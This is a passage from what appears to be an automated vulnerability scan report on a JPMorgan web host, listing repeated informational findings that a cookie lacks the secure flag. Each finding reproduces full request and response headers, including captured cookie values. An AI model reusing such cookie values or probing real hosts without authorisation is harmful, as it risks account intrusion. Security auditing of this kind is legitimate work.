User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"23404-1310119354000"
Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:52 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 23404
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

// Function to get a new XML Http Request object
function AJAXRequest() {
   if (window.XMLHttpRequest) {
       return new XMLHttpRequest();
   }
   else if (window.ActiveXObject) {
       return new ActiveXOb
...[SNIP]...

7.80. https://mm.jpmorgan.com/js/feedback.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/feedback.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/feedback.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"0-1310119354000"
Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:52 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript


7.81. https://mm.jpmorgan.com/js/gecFunctions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/gecFunctions.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/gecFunctions.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"1705-1310119354000"
Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:52 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 1705
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

var submitGecForm = function() {
   if (document.getElementById('gecForm').action != 'MorganMarkets?page=global_equity_coverage') {
       document.getElementById('gecForm').action = 'MorganMarkets?page=gl
...[SNIP]...

7.82. https://mm.jpmorgan.com/js/menu.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/menu.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/menu.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:51 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"6916-1310119354000"
Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:51 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 6916
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

function hideMenus(element) {
   if(YAHOO.env.ua.ie == 6) {
       return;    
   }

   var lines = YAHOO.util.Dom.getElementsByClassName('showLine', 'li', 'jpmmenu');
   var subLines = YAHOO.util.Dom.getElemen
...[SNIP]...

7.83. https://mm.jpmorgan.com/js/personalisation.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/personalisation.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/personalisation.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"15959-1310119354000"
Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:52 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 15959
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

//Function to get a new XML Http Request object
function AJAXRequest() {
   if (window.XMLHttpRequest) {
       return new XMLHttpRequest();
   }
   else if (window.ActiveXObject) {
       return new ActiveXObj
...[SNIP]...

7.84. https://mm.jpmorgan.com/js/portalBondIndex.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/portalBondIndex.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/portalBondIndex.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:53 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"8066-1310119358000"
Last-Modified: Fri, 08 Jul 2011 10:02:38 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:53 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 8066
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

function makeUrl(url) {
//prefixUrl = "http://morganmarkets.jpmorgan.com";
prefixUrl = "";
fullUrl = prefixUrl + url;
return fullUrl;
}

function docLoc(relUrl) {
//prefix = 'http://mo
...[SNIP]...

7.85. https://mm.jpmorgan.com/js/portlet.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/portlet.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/portlet.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:51 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"7376-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:51 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 7376
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

function refreshAllCheckBoxDivs(portletId,checkBoxSize,displayMaxRows)
{
// var displayMaxRows = 10;
   var portletDiv = document.getElementById(portletId);        
   var visibleDivs = 0;
   var chec
...[SNIP]...

7.86. https://mm.jpmorgan.com/js/yui/button-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/yui/button-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/button-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:54 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"27973-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:54 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 27973
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){var G=YAHOO.util.Dom,M=YAHOO.util
...[SNIP]...

7.87. https://mm.jpmorgan.com/js/yui/connection-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/yui/connection-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/connection-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"13048-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 13048
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
YAHOO.util.Connect={_msxml_progid:["Microsoft
...[SNIP]...

7.88. https://mm.jpmorgan.com/js/yui/container-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/yui/container-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/container-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:55 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"74941-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:55 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 74941
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){YAHOO.util.Config=function(D){if(
...[SNIP]...

7.89. https://mm.jpmorgan.com/js/yui/element-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/yui/element-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/element-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"9242-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 9242
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.8.0r4
*/
YAHOO.util.Attribute=function(B,A){if(A){thi
...[SNIP]...

7.90. https://mm.jpmorgan.com/js/yui/event-delegate-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/yui/event-delegate-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/event-delegate-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"1506-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 1506
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){var A=YAHOO.util.Event,C=YA
...[SNIP]...

7.91. https://mm.jpmorgan.com/js/yui/selector-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mm.jpmorgan.com
Path:   /js/yui/selector-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/yui/selector-min.js HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
